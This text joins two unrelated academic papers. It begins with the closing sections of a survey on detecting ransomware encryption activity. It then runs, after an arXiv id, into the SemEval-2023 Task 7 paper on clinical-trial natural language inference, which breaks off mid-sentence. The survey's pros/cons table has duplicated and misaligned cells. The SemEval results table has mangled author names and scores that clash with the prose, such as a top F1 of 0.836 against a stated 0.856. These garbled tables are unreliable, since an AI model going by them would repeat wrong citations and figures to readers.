solutions utilize different detection methods and measures in a coordinated schema of safeguards, where a comprehensive set of firewalls, intrusion prevention systems, and endpoint protection defenses are adopted to combat real-world threats. Antithetically, the academic approach necessitates the separation of specific detection techniques and their study in isolation, in effect, obfuscating principles of translation. * Scalability Detection solutions developed in an isolated academic environment tend to need help with monitoring and analysis capabilities for the vast amounts of data generated by modern industry networks (Scala et al., 2019). Forasmuch as the complexity and diversity of commercial networks are not to be understated; scaling assumes an integral role in the application of research outcomes in the real-world market (Nicol et al., 2015). * Complexity The algorithms developed through mechanisms of academic inquiry often involve complex and resource-intensive modus operand, which fail to be practical for real-world deployment or, within the nature of their construction, cannot evolve into more flexible setups (Nicol et al., 2012). * Adaptability With standardized models built on specific ransomware samples and behavior patterns in training academically developed technologies, limitations arise in adaptability for real-world applications (Scala et al., 2019). Ransomware, in real world attacks, rarely follows the uniformity established in these test models. On the contrary, its behavior constantly evolves in a race to outmaneuver newly forged preventative measures as they emerge. Likewise, while procedural factors present similar practical limitations as those found with technical factors, the nominal core of these limitations lies in qualities inherent to the experimental process and research objectives rather than market translation: * Validation The process of testing and validation notably differ across academic and industry borders. Research validation roots itself in the accuracy of simulations and the control of experimental conditions. Commercial solutions require rigorous real-world validation against various extraneous variables and incorporating existing infrastructure to ensure effectiveness, reliability, and compatibility (Grossman et al., 2001; Nicol et al., 2015). * False positives Concerning research goals, the process of addressing false positives should be addressed to achieve high detection rates (Bold et al., 2022; Kok et al., 2020). Comparatively, greater emphasis is placed on false positives in the industrial context, as the losses incurred through the resultant disruptions are of greater interest. Hence, commercial solutions seek a compromise between adequate detection accuracy and minimizing false positives. * Time to market Rapid response is necessary to combat the emergence rate of new threats and meet the demands of the commercial market. Concurrently, academic research development, testing, and refinement require heavy time investments for the analytic procedure, translating to a natural lag in the pace of ransomware evolution (Kashef et al., 2023; Nicol et al., 2015). In contrast to technical and procedural factors, which are determined by objectively measurable discrepancies, bureaucratic factors are interpretational, based on institutional inefficiencies of anthropogenic origin. The most effective of which present themselves in restrictions of: * Intellectual property and licensing Hestancy in adopting newly developed technologies based on academic research is often directly tied to the risks involved with an investment in new IPs where precedents have yet to be set on the extent of its protected status. Similar contingencies arise with licensing restrictions that introduce additional expenditures in the form of permissions and approvals. ### Other applications of detection of encryption Detection of encryption is not always related to cryptographic ransomware defense. There are numerous use cases where it would be necessary to recognize if encryption happened or is happening. An example is Ameeno et al. (2019) proposal using the Naive Bayes algorithm to differentiate between compression and encryption and identify file types. Li and Liu (2020) proposed an encryption detection method using deep convolutional neural networks (CNN). The proposal uses converted raw data into two-dimensional matrices as an input to CNN. The results showed a higher detection rate than competitive storage and network encryption methods. In another proposal that utilizes the power of machine learning and deep learning, Yang et al. (2021) propose the usage of natural language processing (NLP) in combination with the two in detecting encrypted network traffic. The technique usually used for weighting in message retrieval and keyword extraction, Term Frequency-Inverse Document Frequency (TF-IDF), was used in modeling detection due to its capability not to need analysis of each field in network traffic. Both ensembles of various machine learning classifiers and CNN were used with high accuracy and their own advantages. The advantage of CNN in deep learning is that it efficiently deals with sparse matrices (compressed or uncompressed) generated by TF-IDF in situations where there is an "abundance" of hardware resources. On the other hand, encrypted traffic detection in limited hardware resources is better suited for ensemble classifiers. Finally, even though somehow similar to crypto-ransomware encryption detection, a proposal by Dong et al. (2021) named MBTree deals with the detection of encrypted traffic between Remote Access Trojan (RAT) and Command & Control server (C2). The proposal relies on building the kind of baseline by integrating flow-level DirPiz sequences as a synthesis of host-level Multi-Level Tree (MITree). Actual detection was done by measuring path similarity and node similarity of actual traffic with the baseline. The F-1 score reported is 94%. ## 4 Conclusion In closing, our journey through the myriad proposals relating to the detection of pre-encryption and encryption activities by cryptographic ransomware has surfaced some findings and lessons learned. The dynamic nature of ransomware necessitates constant vigilance, innovation, and adaptation. Each of the surveyed methodologies has its own advantages and disadvantages. This all is the reason we present section 4.1, Lessons learned. Our findings in section 4.2 underscore the importance of multi-layered, robust detection mechanisms and the need for more research focusing on encryption as the major motivation for the attack. We hope this analysis serves as a catalyst for further advancements and a guide-post for future endeavors in combating cryptographic ransomware. ### Lessons learned In this paper, we reviewed cryptographic ransomware from the perspective of what we believe is its differentiating factor from other families of cyberattacks, namely encryption. Here we summarize the lessons learned in this survey. Foremost, crypto-ransomware is an increasing threat that cripples critical capabilities for both public and commercial services for an extended period of time. When we add the amounts of paid ransoms, losses are in the tens of millions of dollars. They could result in loss of human life, taking into consideration ransomware groups" "taste" for medical facilities during the time of the COVID-19 pandemic, or even involve themselves in cyber warfare. Secondly, researchers have seen a discrepancy in describing and categorizing ransomware ranging from plain malware to sophisticated cyber kill chains representing the activity of sophisticated APT-like threat actors. We observed ransomware through our cyber kill chain. Thirdly, from a research perspective, we have seen many proposals dealing with different aspects of crypto-ransomware, and most of them take a hybrid approach to deliver the solution. Fourthly, we have seen that despite the academic community's mature and focused research, commercial solutions mainly apply machine learning and anomaly detection solutions. Finally, we have seen that specialized research around the problem of encryption detection and general control of encryption operations is in the apparent minority among the research topics into crypto-ransomware. Overall, there is no one-size-fits-all answer to the most effective approach. The effectiveness of each method depends on the specific ransomware and its behavior. Combining all approaches and machine learning may offer the best defense against ransomware attacks. Adding to that behavioral analysis and user awareness, effectiveness increases significantly. The information in Table 3 summarizes the pros and cons of each methodology, providing the argument for the hybrid approach advantage. These conclusions result from a review and study of different proposals presented in this survey and our research into commercial solutions that offer capabilities that could be used to detect pre-encryption and encryption activities by ransomware attacks. ### Main findings We focused on the Encryption phase described in our cyber kill chain and divided various methodologies into three major groups: * API and system call monitoring-based detection * I/O monitoring-based detection * file system monitoring-based detection Reviewing the work of researchers through the prism of those three detection methodologies, it was not surprising that, in the case of complete proposals for detection, researchers preferred a hybrid approach utilizing primarily combinations of the three or fewer methodologies, with machine learning being the preferred tool in many proposals. Most of the research was focused on Windows operating systems, but Android mobile operating systems and a variety of Internet of Things applications were also present in the reviewed work. The overall conclusion of this survey is that more methods and techniques described in the surveyed research efforts should be utilized in real-life products by trying to remove some of the common obstacles already described. Detecting pre-encryption and encryption activities provides a high level of confidence that ransomware can be intercepted before doing severe damage. Introducing some benchmark methods in the detection of encryption along \begin{table} \begin{tabular}{p{142.3pt} p{142.3pt} p{142.3pt} p{142.3pt}} \hline Methodology & Pros & Cons & Cons & Effectiveness \\ \hline API and system call monitoring-based detection & It provides real-time detection, as systems calls and APIs are used during the ransomware’s activities. It can reveal information about the ransomware’s inner workings, which may aid in further developing or fine-tuning the countermeasures. It can be combined with other detection techniques for increased accuracy. Enables the identification of specific attack vectors and potentially vulnerable system components. & False positives may arise due to benign software with similar system call patterns. & This approach can be highly effective because ransomware often uses specific system calls and APIs to access and manipulate files. Monitoring for unusual patterns in these calls can help identify ransomware activities. & This approach can be highly effective because ransomware often uses specific system calls and APIs to access and manipulate files. Monitoring for unusual patterns in these calls can help identify ransomware activities. & This approach can be highly effective because ransomware often uses specific system calls and APIs to access and manipulate files. Monitoring for unusual patterns in these calls can help identify ransomware activities. & This approach can be highly effective because ransomware often uses specific system calls and APIs to access and manipulate files. Monitoring for unusual patterns in these calls can help identify ransomware activities. & This approach can be highly effective, as ransomware typically generates high 1/0 activity while encrypting large numbers of files. \\ \hline I/O monitoring-based detection & It can be used as an early warning system, as I/O spikes might indicate ongoing ransomware activity. It can be less resource-intensive compared to monitoring system calls and APIs. It can detect ransomware even if it uses unconventional or previously unseen system calls and APIs, if the I/O patterns are consistent with encryption activities. Reatively easier to implement compared to monitoring system calls and APIs. Allows for the identification of affected files and systems, enabling targeted response and recovery efforts. & This approach is moderately effective, as ransomware typically generates significant 1/0 activity while encrypting large numbers of files. & This approach is moderately effective, as ransomware typically generates high 1/0 activity while encrypting large numbers of files. \\ \hline Filesystems monitoring-based detection & It allows ransomware detection based on its unique file manipulation behavior. It can provide insights into the ransomware’s encryption strategy, aiding in decryption and recovery efforts. It can detect ransomware that employs file-level encryption, which is a common feature in many ransomware strains. It can help identify the specific encryption algorithms used by ransomware, which may aid in decryption efforts. It provides opportunities for early intervention, as filesystem-related activities typically occur before actual encryption. & It may produce false positives due to benign applications with similar filesystem-related activities. & This approach can be highly effective, as ransomware often exhibits specific file access and modification patterns, such as ransomware files, changing file extensions, or modifying file attributes. \\ \hline \end{tabular} \end{table} Table 3: Pros, Cons and Effectiveness of different methodologies for detecting ransomware’s pre-encryption and encryption activities. with appropriate datasets is a desperate needle in this area of research. ## Declaration of Competing Interest The authors declare that they have no known competing financial interests or personal relationships that could have appeared to influence the work reported in this paper. ## CRediT authorship contribution statement **Kenan Begovic:** Conceptualization, Methodology, Formal analysis, Resources, Writing - original draft, Writing - review & editing. **Abdulaziz AI-Ali:** Conceptualization, Validation, Writing - review & editing. Supervision. **Quttaibah Malluhi:** Conceptualization, Validation, Writing - review & editing, Supervision. **Data availability** No data was used for the research described in the article.
2305.02993
SemEval-2023 Task 7: Multi-Evidence Natural Language Inference for Clinical Trial Data
This paper describes the results of SemEval 2023 task 7 -- Multi-Evidence Natural Language Inference for Clinical Trial Data (NLI4CT) -- consisting of 2 tasks, a Natural Language Inference (NLI) task, and an evidence selection task on clinical trial data. The proposed challenges require multi-hop biomedical and numerical reasoning, which are of significant importance to the development of systems capable of large-scale interpretation and retrieval of medical evidence, to provide personalized evidence-based care. Task 1, the entailment task, received 643 submissions from 40 participants, and Task 2, the evidence selection task, received 364 submissions from 23 participants. The tasks are challenging, with the majority of submitted systems failing to significantly outperform the majority class baseline on the entailment task, and we observe significantly better performance on the evidence selection task than on the entailment task. Increasing the number of model parameters leads to a direct increase in performance, far more significant than the effect of biomedical pre-training. Future works could explore the limitations of large models for generalization and numerical inference, and investigate methods to augment clinical datasets to allow for more rigorous testing and to facilitate fine-tuning. We envisage that the dataset, models, and results of this task will be useful to the biomedical NLI and evidence retrieval communities. The dataset, competition leaderboard, and website are publicly available.
Maël Jullien, Marco Valentino, Hannah Frost, Paul O'Regan, Donal Landers, André Freitas
2023-05-04T16:58:19Z
http://arxiv.org/abs/2305.02993v2
# SemEval-2023 Task 7: Multi-Evidence Natural Language Inference for Clinical Trial Data ###### Abstract This paper describes the results of SemEval 2023 task 7 - Multi-Evidence Natural Language Inference for Clinical Trial Data (NLI4CT) - consisting of 2 tasks, a Natural Language Inference (NLI) task, and an evidence selection task on clinical trial data. The proposed challenges require multi-hop biomedical and numerical reasoning, which are of significant importance to the development of systems capable of large-scale interpretation and retrieval of medical evidence, to provide personalized evidence-based care. Task 1, the entailment task, received 643 submissions from 40 participants, and Task 2, the evidence selection task, received 364 submissions from 23 participants. The tasks are challenging, with the majority of submitted systems failing to significantly outperform the majority class baseline on the entailment task, and we observe significantly better performance on the evidence selection task than on the entailment task. Increasing the number of model parameters leads to a direct increase in performance, far more significant than the effect of biomedical pre-training. Future works could explore the limitations of large models for generalization and numerical inference, and investigate methods to augment clinical datasets to allow for more rigorous testing and to facilitate fine-tuning. We envisage that the dataset, models, and results of this task will be useful to the biomedical NLI and evidence retrieval communities. The dataset1, competition leaderboard2, and website3 are publicly available. Footnote 1: [https://github.com/ai-systems/nli4ct](https://github.com/ai-systems/nli4ct) Footnote 2: [https://codalab.lism.upsaclay.fr/competitions/8937#learn_the_details](https://codalab.lism.upsaclay.fr/competitions/8937#learn_the_details) Footnote 3: [https://sites.google.com/view/nli4ct/](https://sites.google.com/view/nli4ct/) ## 1 Introduction Clinical trials are indispensable for experimental medicine as they test the efficacy and safety of novel treatments (Avis et al., 2006). Clinical Trial Reports (CTRs) are documents that detail the methodology and results of a trial, implemented to guide personalized and targeted interventions for patients. However, there are 400,000+ published CTRs, with an increasing number being published every year (Bastian et al., 2010), making it impractical to manually carry out comprehensive evaluations of all the relevant literature when designing new treatment protocols (DeYoung et al., 2020). To address this challenge, Natural Language Inference (NLI) (Bowman et al., 2015; Devlin et al., 2019) offers a potential solution for the large-scale interpretation and retrieval of medical evidence, to support a higher level of precision and efficiency in personalized evidence-based care (Sutton et al., 2020). SemEval-2023 Task 7 - Multi-Evidence Natural Language Inference for Clinical Trial Data (NLI4CT) - is based on the NLI4CT dataset which contains 2 tasks on breast cancer CTRs, shown in Figure 1: We propose two tasks for reasoning on clinical trial data expressed in natural language. Firstly, to predict the entailment of a **Statement** and a **CTR** premise, and secondly, to extract evidence to support the label. Figure 1. Firstly to determine the inference relation between a natural language statement, and a CTR. Secondly, to retrieve supporting facts from the CTR(s) to justify the predicted relation. The inference task requires Multi-hop reasoning, that is the ability to combine information from multiple pieces of text to draw inferences (Jansen et al., 2018; Dalvi et al., 2021). Previous works have shown that although multi-hop reasoning can be implemented on large-scale scientific tasks, there is a significant drop-off in performance as the number of necessary hops increases (Valentino et al., 2022, 2021; Thayaparan et al., 2022, 2021). A large proportion of the NLI4CT dataset instances require the construction of inference chains in this drop-off range. Additionally, numerical and quantitive reasoning is required to perform inference on NLI4CT, exemplified in Figure 1. Studies have shown that transformer-based models are unable to consistently apply this type of reasoning, instead relying on shallow heuristics for predictions (Patel et al., 2021; Ravichander et al., 2019; Galashov et al., 2019). In the NLI4CT inference task, both the multi-hop and the numerical reasoning have the added complexity of being applied to CTRs. Studies have demonstrated that the word distribution shift from general domain corpora to biomedical corpora, such as CTRs, caused by the increased prevalence of aliases, acronyms, and biomedical terminology represents a significant detriment to model performance (Lee et al., 2019; Grossman Liu et al., 2021; Shickel et al., 2017; Jiang et al., 2011; Moon et al., 2015; Jimeno-Yepes et al., 2011; Pesaranghader et al., 2019; Jin et al., 2019; Wu et al., 2015). This word distribution shift challenge is also present in the evidence selection task. Although the evidence selection task is arguably simpler than the inference task its importance cannot be understated. State-of-the-art NLI models consistently struggle to attend to relevant pieces of evidence when applied to large texts (DeYoung et al., 2020). Additionally, the ability to filter out irrelevant pieces of text reduces the likelihood of distractors (Mishra and Sachdeva, 2020) and reduces the length of the input for inference, improving efficiency. This paper introduces SemEval-2023 Task 7 - Multi-Evidence Natural Language Inference for Clinical Trial Data (NLI4CT) - for biomedical NLI and evidence extraction and presents a detailed analysis of the performance of the participating systems. We report the following conclusions; * The highest scoring system (Zhou et al., 2023) @THiFLY achieved an F1 score of 0.856 and 0.853 on the entailment task and the evidence selection task respectively. * The tasks are challenging, most submissions did not significantly outperform the majority class baseline on the entailment task. * On average, performance on the evidence selection task was higher than on the entailment task. * Increasing the number of model parameters leads to a direct improvement in performance, far out-weighting the effect of biomedical pretraining. ## 2 Related Works There are many existing expert-annotated resources for clinical NLI. The TREC 2021 Clinical Track (Soboroff, 2021) is a large-scale information retrieval task to match patient descriptions to clinical trials for which they are eligible. Evidence Inference 2.0 (DeYoung et al., 2020) is a Question-Answering (QA) task and span selection task, where provided with an outcome, an intervention, and a comparator intervention, systems must infer if the intervention resulted in a significant increase, significant decrease, or produced no significant difference in the outcome measurement, compared to the comparator, and identify spans that support this inference. The MEDNLI (Romanov and Shivade, 2018) dataset is an entailment task to infer the entailment relation between a short piece of text extracted from medical history notes, and an annotated statement. None of the aforementioned tasks encompass the full complexity of NLP over CTRs, that this the capability to reason over all sections CTRs and to simultaneously carry out biomedical and numerical inference. Instead choosing to focus on one specific CTR section. Additionally, these tasks often have repetitive inference chains, i.e. matching statements for eligibility, or retrieving measurements and comparing them. In contrast, NLI4CT instances cover all CTR sections and contain minimal repetition in inference chains, as there is no set template for statements. Currently, Large Language Models (LLM) achieve the best results for clinical NLI Gu et al. (2021); DeYoung et al. (2020). However, they suffer from a plethora of issues. LLMs demonstrate poor performance on quantitative reasoning and numerical operations within NLI Ravichander et al. (2019); Galashov et al. (2019). Additionally, there is a notable drop in performance for LLMs pre-trained on general domain data when applied to biomedical tasks Lee et al. (2019), partially aggravated by a lack of well-annotated clinical data Kelly et al. (2019). NLI4CT is designed to assist in the development and benchmarking of models for clinical NLI. ## 3 Task Description NLI4CT contains two tasks, Task 1, textual entailment, and Task 2, evidence selection. Each instance in NLI4CT contains a CTR premise and a statement. Premises contain 5-500 tokens, describing either the results, eligibility criteria, intervention, or adverse event of a trial, and the statements are sentences with a length of 10-35 tokens (see example in Figure 1), which make one or more claims about the premise. On average 7.74/21.67 facts within the premise are labeled as evidence. There are two types of instances in NLI4CT; single instances where the statement makes a claim about one CTR, and comparison instances, where the statement makes claims comparing and contrasting two CTRs. To summarize: Task 1Classify the inference relation between a CTR premise and a statement, as either an entailment or a contradiction, as shown in Figure 1. Task 2Output a subset of facts from the CTR premise, necessary to justify the class predicted in Task 1. ## 4 Dataset The premises in NLI4CT are obtained from 1000 publicly available English language Breast cancer CTRs published on ClinicalTrials.gov. This data is maintained by the U.S. National Library of Medicine and is subject to the HIPAA Privacy Rule. The CTRs are split into 4 sections: * A set of conditions patients must meet to participate in the trial. * Detailed description of the type, dosage, frequency, and duration of treatments being studied. * Reports the results of the patient cohorts in the trial with respect to a given outcome measurement. * Reports the (serious) signs and symptoms observed in patients during the clinical trial. A group of domain experts, including clinical trial organizers from a major cancer research center, took part in the annotation task. The annotators were given two CTR premises to generate an entailment statement. This is a short text that makes an objectively true claim about the contents of the premise. Annotators could choose to write a statement about one, or both premises. Non-trivial statements typically involve summarization, comparison, negation, relation, inclusion, superlatives, aggregation, or rephrasing, and require understanding multiple rows of the premise. Then the annotators select a subset of facts from the premise(s) that support the claims in the statement. Then a negative rewriting technique Chen et al. (2019) was applied, modifying the previously produced entailment statement to contain objectively false claims while retaining the original sentence structure and length. This technique is used to reduce the likelihood of stylistic or linguistic patterns pertaining to either entailment or contradictory statements. Annotators then extract a subset of facts from the premise that contradict the claims in the false statement, The resulting dataset includes 2400 annotated statements with labels, premises, and evidence. The dataset was split 70/20/10 train/test/dev. The two classes and four sections are evenly distributed throughout the dataset and its splits. ## 5 Evaluation The same strategy is adopted for the evaluation of the results of both Tasks. Task 1, the textual entailment task, is a binary classification task, so performance is measured using Precision, Recall, and Macro F1-score, comparing predicted labels against the gold labels. We also frame Task 2, the evidence selection task, as a binary classification task, classifying each fact in the premise as either relevant evidence, or irrelevant, we compare the predicted labels against the gold labels and compute the Precision, Recall, and Macro F1-score. ## 6 Architectural Paradigms We observe 5 different categories of approaches described in the system papers, recorded in Table 1. Generative language models are designed to learn the joint probability distribution of P(X,Y), where X is the input text, such as the statements or CTR premises, and Y is a probability output by a classification layer or a generated label from a decode-only transformer. Conversely, discriminative language models encode the conditional probability P(YlX), designed to encode the decision boundary between different classes. Biomedical pre-training refers to the technique of training a model on a large, unlabeled biomedical dataset, such as scientific articles or patient health records. This is used to encode general features and patterns within a domain, before fine-tuning a specific task. Semantic rule-based models perform inference based on a set of human-defined asserted facts or axioms. Ontologies capture the categories, properties, and relations between the concepts of a particular domain. Ontology-based models extract entities from the input text and map them to nodes within the ontology to enrich the inputs with domain knowledge. ### Transformers The majority of submitted systems leverage discriminative transformers-based models.As shown in Table 1, 16 participants integrated discriminative transformers-based models [21] into their submitted systems. Generally, a task-specific output layer is appended to the pre-trained layers and fine-tuned on the training to output the probability of a statement being entailed, or a piece of evidence being relevant. Alternatively, 8/21 participants submitted systems based on generative models, as seen in Table 1. These models are either appended with a task-specific output layer and fine-tuned to output a probability or directly output entailment/contradiction or relevant/irrelevant labels. ### Biomedical Pre-training The majority of participants leverage Biomedical pre-training in their systems.As previously described LLMs trained on general domain corpora generalize poorly on biomedical corpora [18]. Therefore many participants choose to apply models that are pre-trained on biomedical texts, such as datasets of scientific articles and patient health records. ## 7 Results and Discussion During the 21-day evaluation period (January 10\({}^{th}\)-31\({}^{st}\), 2023), 40 participants submitted a total of 643 submissions for the entailment task, and 23 participants submitted a total of 364 submissions for the evidence selection task. In total 21 participants submit system papers. Submissions for which a system paper was not provided are omitted from the tables and discussion. The majority of systems fail to significantly outperform the majority-class baseline on the entailment task.Table 2 shows the F1 score, Recall, and Precision for Task 1. The collected results indicate that these tasks are challenging, with the majority of systems failing to achieve significantly above the majority-class baseline (0.667 F1) results on the entailment task. In particular, we observe several systems reporting 0.9-0.95 Recall, and 0.5-0.55 Precision, indicating the systems were almost exclusively predicting the "entailment" class. All systems with submitted papers significantly outperform the random baseline (0.5 F1). The top-performing systems achieve significant gain across both tasks.Zhou et al. zhou2023@THiFLY, Kanakarajan and Sankarasubbu zhou2023@THiFLY. \begin{table} \begin{tabular}{l r} \hline \hline **Technique/Model Type** & **Submissions \#** \\ \hline Generative LLMs & 8 \\ \hline Discriminative LLMs & 16 \\ \hline Ontology-based & 1 \\ \hline Semantic rule-based & 1 \\ \hline Biomedical Pre-training & 12 \\ \hline \hline \end{tabular} \end{table} Table 1: Summary of the techniques and models implemented in the submissions Figure 2: Graph comparing system F1 scores across the entailment task and the evidence selection task (Stein et al., 2023) (Stein et al., 2023) @Stein et al. (2023) @EW-TSC, Vassileva et al. (2023) @FMI-SU, Vladika and Matthes (2023) @Sebis, Huang et al. (2023) @CPIC, Alameldin and Williamson (2023) @Clemson NLP, Bevan et al. (2023) @MDC and Rajamanickam and Rajaraman (2023) @@I\({}^{2}\)R surpass 0.8 F1 on the evidence selection task. The entailment task is more challenging than the evidence selection task.Table 2 shows the F1 score, Recall, and Precision for the evidence selection task. On average systems report a +0.07 higher F1 score on the evidence selection task than on the entailment task, shown in Figure 2. This result was expected as the evidence selection task does not require systems to learn complex decision boundaries between the classes or to perform numerical inference. Submitted systems report higher Recall than Precision.On the evidence selection task, the \begin{table} \begin{tabular}{l l l l l l l l l l} **Work \# Team name** & **Approach** & **Generative/** & **Retrieval** & **Pre-training Datasets** & & **Task 1** & & & **Task 2** \\ & & & **Discriminative** & **type** & & & F1 & Precision & Recall & F1 & Precision & Recall \\ \hline Zhou et al. (2023) & MCNet, BiLSTM and SciFive model ensemble & G + D & Post & PubMed Abstract, PMC & 0.836 & 0.856 & 0.856 & 0.853 & 0.811 & 0.898 \\ ©THKEP & & & & & & & & & & \\ \hline Crankrankzyni and Salarararushboo (2023) & Interaction-fluented LLMs, Flans TS & G + D & - & - & & 0.834 & 0.768 & 0.912 & - & - & - \\ @Stein et al. (2023) & @Stein et al. (2023) & Ensemble of a pipeline and joint system based on DeBERT-v3 & D & Pre & - & & 0.798 & 0.777 & 0.820 & 0.818 & 0.772 & 0.868 \\ \hline Wang et al. (2025) & DeBERT-v3 large. & D & - & - & & 0.764 & 0.757 & 0.772 & - & - & - \\ @Know/Comp & & & & & & & & & & & \\ \hline Chen et al. (2023) & Soft voting ensemble mechanism based on Bi-SNCLE-NLP & Gault/BioBERT & D & Pre & MathNetNL, MelNLL and SNLI & 0.709 & 0.668 & 0.756 & 0.794 & 0.803 & 0.786 \\ \hline Alumeldin and Williamson (2023) & Gault/Tron-BERT & D & Pre & UFNS notes, MIMIC, MIMIC, WIATText, PMC, and extracted CTRs & & & & & & \\ \hline Rjamanickam and Rajaraman (2023) & Evidence level inferences with T5 & G + D & Pre & - & & & & & & & \\ \hline Rjamanickam and Rajaraman (2023) & Evidence level inferences with T5 & G + D & Pre & - & & & & & & & \\ \hline Rjamanickam (2023) & PubMedBERT for evidence retrieval, and Bi-SNCLE-NLP & D & Pre & PubMed abstracts, PMC & 0.695 & 0.668 & 0.724 & 0.804 & 0.814 & 0.795 \\ \hline RjMC & & & & & & & & & & & \\ \hline Zhao et al. (2023) & Zero-shot ChatGPT for entailment and DeBERT-9HW-TSC & G + D & Post & - & & & & & & & \\ \hline Padua and Phana, & Few-shot GPT-3.5 Davinci & G & - & - & & & & & & & \\ \hline Jorg et al. (2023) & BioBERT, supervised contrastive learning, and & D & - & PubMed Abstracts, PMC & 0.679 & 0.621 & 0.748 & - & - & - \\ \hline Rjayanickam and Rajaraman (2023) & BioBERT, unsupervised contrastive learning, and & D & - & PubMed Abstracts, PMC & 0.679 & 0.621 & 0.748 & - & - & - \\ \hline Altiosa and Abdullah (2023) \#UNet-HMM & Role-based Double Roberts-Large & D & - & - & & & & & & & \\ \hline Nove Mohamed and Sadanan (2023) & Semantic Rule based Clinical Data Analysis, & - & Post & - & & & & & & & \\ \hline Cenda Dias et al. (2023) \#W-TURGS & Evidence-SCI, using a modified PuxSCI, model and pre-trained Biomed RoBERTa checkpoints. & D & Pre & Semantic Scholar corpus & 0.666 & 0.500 & 0.996 & 0.681 & 0.615 & 0.764 \\ \hline Tiehanna et al. (2023) \#RjMC & Bio+Clinical/Dist/Bio Discharge Summary & D & - & MIMMIC-III, PubMed Abstract, PMC & 0.662 & 0.575 & 0.780 & - & - & - \\ @Stein et al. (2023) \#Stanford MLab & BERT, and ELECTRA Small ensemble & & - & & & & & & & \\ \hline Cencole et al. (2023) \#DI & Biomedical Ontology annotations, using & - & - & - & & & & & & & \\ \hline WikipediaTM & Scapiy & & & & & & & & & & \\ \hline Nieves (2023) @BIGR & Sentence-based BERT similarity model & D & Post & MIMIC III & 0.640 & 0.497 & 0.900 & 0.671 & 0.583 & 0.789 \\ \hline Wikipedia et al. (2023) \#DIGR & BioBERT model and a CNN model & D & - & PubMed Abstracts, PMC & 0.596 & 0.582 & 0.612 & - & - & - \\ \hline Wikolawiet et al. (2023) & Contextual Data Augmentation to fine-tune & D & - & PubMed Abstracts, PMC, EN Wiki + Books & & & & & & \\ \hline Huang et al. (2023) & Ensembles GPT-2 models with different & G + D & - & - & - & - & - & 0.810 & 0.789 & 0.833 \\ @CPIC & parameter sizes and random seeds. & & & & & & & & & & \\ \hline Muhendana et al. (2023) & BMDS and Word Mover Distance & - & - & - & - & - & - & 0.719 & 0.579 & 0.948 \\ \hline \end{tabular} \end{table} Table 2: Summary of the techniques and models implemented in the leaderboard submissions. (G) Generative model, (D) Discriminative model, (Post) Evidence retrieved after entailment, (Pre) Evidence retrieved before entailment. vast majority of systems record a higher Recall than Precision, with an average difference of +0.055 higher Recall, this disparity is increasingly important with the top 5 systems, with an average difference of +0.077. A potential cause for the disparity between Precision and Recall results is statements such as "Patients with liver disease are eligible for the primary trial" where the full eligibility criteria must be returned, to provide evidence that there are no conditions against liver disease. This incentivizes systems to retrieve a large proportion of the premise, and perhaps more importantly to intentionally retrieve pieces of text that are not relevant to entities contained in the statement (liver disease). However, we hypothesize that the cost of incorrectly labeling relevant information as irrelevant is much more significant than the cost of including distracting information. This is because the entailment of a statement is often dependent on a single line of a premise. Therefore maximizing Recall, even at the cost of Precision may significantly improve evidence completeness. ### Foundational Model Architectures Generative models outperformed discriminative models on the entailment task.As shown in Table 2 the top 2 systems on the entailment task are based on generative models, specifically 2 variants of the T5 model (Raffel et al., 2020), SciFive (Phan et al., 2021) and Flan-T5 (Chung et al., 2022). Both of these models significantly outperform the next best system with +0.058 and +0.036 F1 respectively. It should be noted that SciFive is implemented in Zhou et al. (2023) @THiFLY, as part of an ensemble with Multi-granularity Inference Networks and BiLSTMs, and therefore the system results cannot be solely attributed to the generative components. DeBERTa-v3 outperforms other discriminative transformer-based models on both tasks. DeBERTa-v3-based systems consistently outperform systems that apply discriminative models, on both tasks. This is also observed across a range of different systems settings (Vladika and Matthes, 2023; Zhao et al., 2023; Wang et al., 2023). DeBERTa-v3 remains competitive with the top generative approaches. Increase in model size is correlated with an increase in performance.An increase in model size, as in models with a higher number of parameters, is strongly correlated with better performance on both Tasks. The top 5 systems in both tasks are exclusively composed of Mega Language Models (MLM) such as T5 and DeBERTa-v3-large. Additionally, Vladika and Matthes (2023); Kanakarajan and Sankarasubbu (2023) and Wang et al. (2023) all report MLMs significantly outperforming comparatively smaller models within their individual systems. ### Rule-based systems Rule-based approaches are less competitive than MLMs.Conceicao et al. (2023) @lasige-BioTM experiments with a hybrid system, using the _en_core_sci_lg_ spaCy pipeline to extract entities from CTR premises and retrieving their ancestors from biomedical ontologies, then computing the shortest dependency path between entities, assisted with Counts and Measurements Rules to process numerical values. The premise is then combined with the premise and classified using cosine similarity. Noor Mohamed and Srinivasan (2023) @SSNSheerinKavitha applies a semantic rule-based system consisting of a Negation equivalence rule, Double negation rule, Deductive reasoning rule, and a Condition-based equivalence rule. Classification is obtained using TF-IDF vectors and RBF-Kernel distance similarity, and evidence is selected using BM25. As seen in Table 2, these systems are not competitive with the top-performing MLMs, however, if this disparity could be corrected, symbolic models inherently offer a higher level of transparency and interpretability than current neural models. ### Data augmentation Data-augmentation does not result in a significant performance increase.Correa Dias et al. (2023) investigates transfer learning opportunities by adding a neutral class to NLI4CT, and merging it with MultiNLI (Williams et al., 2018) and MedNLI (Romanov and Shivade, 2018) to train their system. Vassileva et al. (2023) @FMI-SU annotates premise facts with structural context information, attaching trial names, cohort numbers, and parent subsection headings. They observed that the trial name does not improve performance, in some cases even adding noise, but showed some improvement with cohort and subsection annotations. Alameldin and Williamson (2023) @Clemson NLP compile an additional 9000 CTRs, and train a GatorTron model with a masked-language modeling objective for one epoch, before fine-tuning on NLI4CT. Results from this experiment reveal minor performance gains from the additional training data. Takehana et al. (2023) @Stanford Mlab uses a combination of back translation, synonym replacement, Random insertions, deletions, and swapping of words on NLI4CT to quadruple the size of the training set. The results presented in Table 2 demonstrate that data augmentation does not inherently result in improved performance, and highlight the importance of selecting suitable tasks, data, or annotations, with respect to the target domain. ### Biomedical Pre-training There is no consistently superior biomedical pre-training strategy.Models pre-trained on the PubMed Abstract and PubMed Central (PMC) datasets were implemented in 6/21 systems, including the top-performing system Zhou et al. (2023) @THiFLY. Additionally, 4/21 systems use models pre-trained on MIMIC III. There is no observable correlation between pre-training data and model performance. Biomedical pre-training is not sufficient to achieve state-of-the-art performance.As seen in Table 2 3/5 of the top 5 systems for the entailment task and the evidence selection task do not apply any biomedical pre-training strategies. Furthermore, Kanakarajan and Sankarasubbu (2023) @Saama AI Research demonstrates that large generative models are capable of outperforming the majority-class baseline on the entailment task, even in a zero-shot setting. Additionally, Vladika and Matthes (2023) and Wang et al. (2023) record DeBERTa-v3 (He et al., 2021) significantly outperforming comparatively smaller models pre-trained on biomedical data. ### Evidence-based NLI Many of the discriminative models have a limited input length, often smaller than the CTR premise token length 